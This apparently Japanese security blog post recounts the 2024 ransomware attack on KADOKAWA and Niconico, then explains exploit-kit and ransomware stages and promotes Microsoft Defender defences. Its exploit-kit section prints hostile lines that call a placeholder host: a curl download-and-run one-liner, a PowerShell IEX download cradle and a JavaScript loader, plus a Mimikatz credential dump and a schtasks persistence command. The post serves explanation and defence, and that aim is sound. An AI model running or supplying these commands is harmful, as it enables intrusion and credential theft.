KADOKAWAサイバー攻撃
KADOKAWAは2024年6月8日に大規模なランサムウェア攻撃を受け、その影響で複数のサービスが停止しました。この攻撃は特にニコニコ動画を運営するDwangoのサーバーを標的とし、攻撃者はシステムの脆弱性を悪用して権限昇格や横展開を行い、内部ネットワーク全体に影響を及ぼしました。
情報によると「BlackSuit」を名乗るハッカー集団が闇サイトに公開した犯行声明だと言います。
そこには「私たちは1.5TBのデータをダウンロードした」と書かれており、ハッカー集団は出版大手KADOKAWAにサイバー攻撃を行い、会社の事業計画や様々な機密データを盗み取ったと主張しました。
さらに、金銭を支払わなければ来週月曜日にも全てのデータを公開すると述べています。犯行声明の真偽は分かっていませんが、KADOKAWAではサイバー攻撃によってニコニコ動画などのサービスが利用できない状態が続いています。
source:
🟧 #HackTuesday 🟧
— HackManac (@H4ckManac) June 25, 2024
Hack Tuesday: Week 19 - 25 Jun 2024
⚠️ 84 ransomware victims all over the world by 26 hacking groups ⚠️
The most active ransomware group this week has been Play with 10 claimed attacks.
The most affected country is the United States, accounting for 50% of… pic.twitter.com/tK6I0c2DB2
攻撃の概要と影響
攻撃の経緯: 6月8日の早朝、KADOKAWAの複数のサーバーがアクセス不能になり、内部調査によりランサムウェア攻撃が確認されました。攻撃者はシステムに侵入し、データを暗号化することで身代金を要求する典型的なランサムウェアの手法を使用しました。
影響範囲: ニコニコ動画、ニコニコ生放送、ニコニコチャンネルなどのサービスが停止し、ログイン機能や外部サービスへのアクセスも制限されました。また、出版物のリリースや商品出荷にも遅れが生じ、KADOKAWAの全体的な業務に広範な影響を与えました。
対応と復旧
初期対応: 攻撃を受けた直後、KADOKAWAは影響を受けたサーバーを迅速にシャットダウンし、データ保護のために物理的にサーバーの電源と通信ケーブルを切断しました。その後、警察と外部の専門家と協力して詳細な調査を開始しました。
復旧計画: ニコニコ動画のシステム全体を再構築する必要があると判断され、完全な復旧には少なくとも1ヶ月以上かかる見込みです。サービスの再開は段階的に行われ、ニコニコプレミアム会員や有料チャンネル運営者には6月と7月の補償が提供されます。
攻撃手法
脆弱性の悪用: 攻撃者は未パッチの脆弱性や古いソフトウェアを悪用してシステムに侵入し、権限昇格や横展開を行いました。具体的な攻撃手法には、スピアフィッシングメールの送信やエクスプロイトキットの使用が含まれます。
影響の詳細
サービス停止: ニコニコ動画関連のサービスが全面停止し、ログイン機能や外部サービスへの連携も影響を受けました。これは日本国内の多くのユーザーやコンテンツクリエイターに大きな影響を与えています。
業務への影響: 出版物のリリース遅延、商品出荷の遅れ、内部編集および生産システムの停止などが発生し、KADOKAWAの全体的な業務に広範な影響を与えています。
今後の対策
KADOKAWAは、ネットワークのセキュリティ強化とデータ保護のための措置を継続的に実施し、再発防止のための取り組みを進めています。また、被害の全容が明らかになるまでの間、詳細な調査を続ける予定です。
この攻撃は、企業が脆弱性管理とネットワークセキュリティの重要性を再認識するきっかけとなりました。KADOKAWAの対応と復旧計画は、他の企業にも参考になる重要なケーススタディとなるでしょう。
攻撃者の情報
一部で犯行グループの名前が出てますが…。
攻撃者に関する情報は現在調査中であり、特定には至っていないようです。ただし、以下に既知の情報と考察をまとめます。
攻撃者の手口と動機
攻撃手法:
ランサムウェアの使用: 攻撃者はシステムにランサムウェアを仕掛け、データを暗号化し身代金を要求しました。
リモート操作: 攻撃者はリモートでサーバーを再起動させ、攻撃を継続するための試みを行いました。これに対抗するために、KADOKAWAは物理的にサーバーの電源と通信ケーブルを切断する必要がありました。
脆弱性の悪用: 攻撃者は未パッチの脆弱性や古いソフトウェアを悪用してシステムに侵入し、権限昇格や横展開を行いました。
動機:
一般的にランサムウェア攻撃の主な動機は金銭的利益です。攻撃者はデータの復旧のために身代金を要求することで利益を得ようとします。
影響と対応
影響:
ニコニコ動画などの主要サービスの停止
出版物のリリース遅延や商品出荷の遅れ
内部ネットワークおよびシステムの広範な影響
対応:
サーバーのシャットダウンと物理的な切断
警察および外部専門家との協力による詳細な調査
セキュリティ強化と再発防止のための対策
攻撃者に関する特定情報
現時点で具体的な攻撃者の身元やグループについての情報は公開されていません。しかし、攻撃の規模と手法から、組織的な犯罪グループが関与している可能性が高いと考えられます。また、攻撃者が高度な技術を持ち、組織内の複数のシステムに対して一斉に攻撃を仕掛けたことから、攻撃準備が周到に行われたことが推測されます。
ということです。ここからは改めてランサムウェア攻撃ってどんなものなのかについて触れていきたいと思います。
ランサムウェアの構造について
※ここからの解説と攻撃手法は、KADOKAWAが受けたものとは一切関連性はありません。あくまで一般的な攻撃手法の構造の解説です。
ランサムウェア攻撃に関する詳細をセキュリティエンジニアの観点から解説します。
初期侵入 (Initial Access)
スピアフィッシング (Spear Phishing)
T1566.001: 攻撃者は特定の従業員をターゲットにしたフィッシングメールを送信し、悪意のある添付ファイルを開かせることで、初期侵入を試みました。メールの添付ファイルは、マルウェアを含む実行可能ファイルやスクリプトでした。
対策: Eメールフィルタリング、従業員のセキュリティ教育、マルウェアスキャンの強化。
エクスプロイトキットの使用 (Exploit Kits)
T1203: 攻撃者はウェブブラウザやプラグインの脆弱性を悪用するエクスプロイトキットを使用して、マルウェアを配布しました。これにより、ユーザーが悪意のあるウェブサイトにアクセスすると、脆弱性が自動的に悪用されました。
対策: 最新のソフトウェアアップデートとパッチの適用、ウェブフィルタリング。
実行 (Execution)
スクリプト実行 (Script Execution)
T1059.001: 攻撃者はPowerShellスクリプトを使用して、マルウェアをダウンロードし実行しました。これにより、攻撃者はリモートからコマンドを実行する能力を獲得しました。
対策: PowerShellのログと監視、実行ポリシーの設定、アプリケーションホワイトリスト。
コマンドラインインタープリタの使用 (Command-Line Interface)
T1059: 攻撃者はコマンドラインを使用してマルウェアを実行し、システムの制御を確立しました。
対策: コマンドラインの監視とログ、適切な権限管理。
権限昇格 (Privilege Escalation)
脆弱性の悪用 (Exploitation for Privilege Escalation)
T1068: 攻撃者はシステムの脆弱性を悪用して、通常ユーザーから管理者権限への昇格を行いました。特に、未パッチの脆弱性が狙われました。
対策: 定期的な脆弱性スキャンとパッチの適用、最小権限の原則の徹底。
横展開 (Lateral Movement)
認証情報の収集 (Credential Dumping)
T1003: 攻撃者は認証情報を収集し、他のシステムにアクセスするために使用しました。
対策: LSASSの保護、認証情報のハッシュ化、二要素認証。
内部ネットワークのスキャン (Network Scanning)
T1046: 攻撃者は内部ネットワークをスキャンして、他の脆弱なシステムを探し出しました。
対策: 内部ネットワークの監視とログ解析、異常なスキャン活動の検出。
持続性の確保 (Persistence)
バックドアの設置 (Backdoor Installation)
T1542.003: 攻撃者はブートキットをインストールし、システム再起動後も持続的にアクセスできるようにしました。
対策: BIOS/UEFIのセキュリティ設定、定期的なファームウェアアップデート。
スケジュールタスクの作成 (Scheduled Task)
T1053: 攻撃者はスケジュールタスクを作成し、定期的にマルウェアを再実行するようにしました。
対策: タスクスケジューラの監視、不正なタスクの削除。
エクスプロイトキットの構造について
エクスプロイトキット (Exploit Kits) は、ウェブベースの脅威であり、攻撃者がターゲットのシステムにマルウェアを配布するために使用します。エクスプロイトキットは、主にウェブサイトを通じて展開され、訪問者のブラウザやプラグインの脆弱性を悪用します。以下に、エクスプロイトキットの構造と手法について詳しく説明します。
エクスプロイトキットの構造
エクスプロイトキットは一般的に以下のコンポーネントで構成されています。
Landing Page (ランディングページ):
攻撃者がホストするウェブページで、訪問者を誘導するために使用されます。このページには、ブラウザやプラグインのバージョンを検出するスクリプトが含まれており、ターゲットの環境に最適なエクスプロイトを決定します。
エクスプロイトのリポジトリ:
脆弱性を悪用するためのスクリプトやコードが保存されています。これには、Adobe Flash、Java、ブラウザ(例えば、Internet ExplorerやChrome)などの脆弱性が含まれます。
Command and Control (C&C) サーバー:
攻撃者がエクスプロイトキットを操作し、感染後のマルウェアを制御するために使用します。このサーバーは、被害者のシステムから情報を収集し、さらなる攻撃指示を送信します。
Payload (ペイロード):
成功したエクスプロイト後にターゲットのシステムにインストールされるマルウェア。これは、ランサムウェア、キーロガー、トロイの木馬など、さまざまな種類のマルウェアが含まれます。
エクスプロイトキットの手法
エクスプロイトキットは、以下の手法を使用して脆弱性を悪用します。以下に具体的な手法と、それに対応するコマンドを以下に示します。これらの手法は、エクスプロイトキットがターゲットのシステムにマルウェアを配布するために使用する典型的な方法です。
ドライブバイダウンロード (Drive-By Download)
ユーザーが悪意のあるウェブサイトを訪問するだけで、エクスプロイトが実行され、マルウェアがダウンロードされます。ユーザーの介入は必要ありません。
ランディングページの作成
ランディングページには、ユーザーのブラウザ情報を収集し、適切なエクスプロイトを選択するJavaScriptが含まれています。
<script>
var userAgent = navigator.userAgent;
if (userAgent.indexOf("Windows") !== -1) {
// Windows用のエクスプロイトをロード
loadExploit("windows_exploit.swf");
} else if (userAgent.indexOf("Mac") !== -1) {
// Mac用のエクスプロイトをロード
loadExploit("mac_exploit.dmg");
}
function loadExploit(exploit) {
var script = document.createElement('script');
script.src = "http://malicious-website.com/" + exploit;
document.body.appendChild(script);
}
</script>エクスプロイトの実行:
curl http://malicious-website.com/exploit -o /tmp/exploit && chmod +x /tmp/exploit && /tmp/exploit
選択されたエクスプロイトがユーザーのブラウザで実行され、ペイロードがダウンロードされます。
ウェブリダイレクト
正規のウェブサイトが攻撃者によって改ざんされ、訪問者がエクスプロイトキットのホストする悪意のあるページにリダイレクトされます。
フィッシングメール (Phishing Email)
フィッシングメール内のリンクをクリックすることで、ユーザーがエクスプロイトキットのホストするウェブサイトに誘導されます。フィッシングメール内に悪意のあるリンクを含め、ユーザーをエクスプロイトキットのホストするウェブサイトに誘導する手法です。
スピアフィッシングメールの送信:
sendemail -f attacker@example.com -t target@example.com -u "Important Update" -m "Please see attached document" -a malicious_attachment.pdf
エクスプロイトキットのペイロード配布
エクスプロイトが成功すると、ペイロードがダウンロードされ、システムにインストールされます。
PowerShellコマンド:
powershell -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious-website.com/malicious.ps1')"
横展開 (Lateral Movement)
エクスプロイトが成功した後、攻撃者はネットワーク内の他のシステムに拡散を試みます。以下のPowerShellコマンドを実行します。
認証情報の収集:
Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"
内部ネットワークのスキャン:
nmap -sP 192.168.1.0/24
持続性の確保 (Persistence)
攻撃者がシステムに持続的なアクセスを確保するために設定する手法です。
バックドアの設置:
bootkit_install -payload /path/to/bootkit
スケジュールタスクの作成:
schtasks /create /sc minute /mo 1 /tn "Updater" /tr "cmd.exe /c payload.exe"
エクスプロイトキットは、複数の段階を経てターゲットシステムに侵入し、マルウェアを配布します。これらの手法には、最新のソフトウェアアップデート、セキュリティソフトの導入、ユーザー教育などを通じた対策が必要です。企業はこれらの攻撃に対抗するために多層的なセキュリティ対策を講じる必要があります。
脆弱性のスキャン
ランディングページのスクリプトが、ユーザーのブラウザやプラグインのバージョンを検出し、適切なエクスプロイトを選択して実行します。
【具体例】 Angler Exploit Kit
Angler Exploit Kitは、過去に広く使われたエクスプロイトキットの一例です。このキットは以下の手法を使用していました:
ランディングページ:
ユーザーが訪問すると、JavaScriptを使用してブラウザの情報を収集し、脆弱性を特定します。
エクスプロイト実行:
例えば、Adobe Flashの脆弱性(CVE-2015-0313)を悪用して、シェルコードを実行し、ペイロードをダウンロードさせます。
ペイロードのインストール:
ランサムウェアや情報窃取型マルウェアをターゲットシステムにインストールします。
防御対策
エクスプロイトキットによる攻撃を防ぐための対策は以下の通りです:
ソフトウェアのアップデート:
ブラウザやプラグインを常に最新の状態に保つことで、既知の脆弱性を悪用されるリスクを減少させます。
セキュリティソフトの使用:
エクスプロイトキットの活動を検出し、ブロックする能力を持つセキュリティソフトを使用します。
ウェブフィルタリング:
悪意のあるウェブサイトへのアクセスをブロックするためのフィルタリングソリューションを導入します。
ユーザー教育:
フィッシング攻撃や不審なリンクへの対策についてユーザーを教育します。
エクスプロイトキットは、複雑で高度な攻撃手法を持つため、防御には多層的なアプローチが必要です。
攻撃に対応するには?
エクスプロイトキットによる攻撃を防ぐためには、MicrosoftのDefender製品を活用することが有効です。以下に具体的なDefender製品と、その防御プロセスを説明します。
Microsoft Defender for Endpoint
Microsoft Defender for Endpointは、エンドポイントの保護、検出、対応を提供する包括的なエンタープライズ向けセキュリティソリューションです。この製品は、以下のプロセスを通じてエクスプロイトキットによる攻撃を防ぎます。
リアルタイム保護:
動作: Microsoft Defenderはリアルタイムでエンドポイントを監視し、疑わしい活動やマルウェアの実行を検出します。エクスプロイトキットが使用するスクリプトやエクスプロイトを検出し、即座にブロックします。
プロセス: シグネチャベースの検出と、機械学習を活用したヒューリスティック分析を組み合わせることで、既知および未知の脅威を特定します。
攻撃サーフェス削減:
動作: 攻撃サーフェス削減ルール (ASR) を設定して、特定の動作(例:不要なマクロの実行、悪意のあるスクリプトの実行)を制限します。
プロセス: グループポリシーまたはMicrosoft Intuneを使用して、ASRルールを構成および適用します。例えば、Officeファイルからの悪意のあるコードの実行を防止する設定を行います。
エクスプロイト防止:
動作: エクスプロイト防止 (Exploit Guard) を使用して、システムの脆弱性を悪用する攻撃を防ぎます。これは、メモリ保護や制御フローの保護などの技術を含みます。
プロセス: WindowsセキュリティセンターからExploit Guardを有効にし、アプリケーションガード、ネットワーク保護、攻撃面削減を構成します。
アドバンスドハンティング:
動作: Defender for Endpointは、詳細なログと監視データを提供し、セキュリティチームが潜在的な脅威をプロアクティブに検索することを可能にします。
プロセス: セキュリティオペレーションセンター (SOC) がMicrosoft Defender Security Centerを使用してカスタムクエリを実行し、疑わしい活動や脅威のインジケーターを特定します。
Microsoft Defender for Office 365
Microsoft Defender for Office 365は、フィッシング攻撃や悪意のある添付ファイルからの保護を提供します。
メールフィルタリング:
動作: フィッシングメールやスパムメールをリアルタイムで検出し、ユーザーに届く前にブロックします。
プロセス: 機械学習アルゴリズムとシグネチャベースの検出を組み合わせて、疑わしいメールを特定し、隔離します。
リンク保護:
動作: メール内のリンクをリアルタイムで検査し、悪意のあるリンクをクリックするのを防ぎます。
プロセス: 安全なリンク機能を有効にし、ユーザーがクリックする前にリンクを検査し、悪意のあるリンクをブロックします。
Microsoft Defender for Identity
Microsoft Defender for Identityは、Active Directory環境の保護を強化し、認証情報の収集や横展開の防止に役立ちます。
異常な活動の検出:
動作: 異常なログイン活動や権限の昇格など、内部の脅威を検出します。
プロセス: 継続的にActive Directoryトラフィックを監視し、異常なパターンや振る舞いをリアルタイムで検出します。
レスポンス:
動作: 異常が検出された場合、自動的にアラートを発し、必要に応じてセキュリティチームに通知します。
プロセス: Defender for Identityダッシュボードを使用して、アラートを確認し、適切な対応を行います。
Microsoft Defender製品は、エクスプロイトキットによる攻撃を多層的に防御します。リアルタイム保護、エクスプロイト防止、メールフィルタリング、リンク保護、異常検出などの機能を組み合わせることで、包括的なセキュリティ対策を提供します。企業はこれらのツールを効果的に活用し、定期的なセキュリティポリシーの更新と監視を行うことが重要です。
最後に
KADOKAWAのSecurity対策は高度なレベルで保たれていたものの、今回の件には脆弱な入り口から入って「権限昇格」し「ラテラル・ムーブメント」によって上位権限までたどり着いた可能性があります。
子会社の一社員ないし派遣社員のID/PWを取得し、そこから上位レイヤーに遷移していったのかもしれません。
KADOKAWAの件については深く調査も難しいので、次回の記事で「ダークウェブ」について触れていこうと思います。
ダークウェブの有名どころは詳しいIT系の映画などでも名前が上がる「Tor」について、どんな取引が行われているのか書いていきます。
すぐに投稿しようとは思ってるので、少しお待ちください。
ではまた!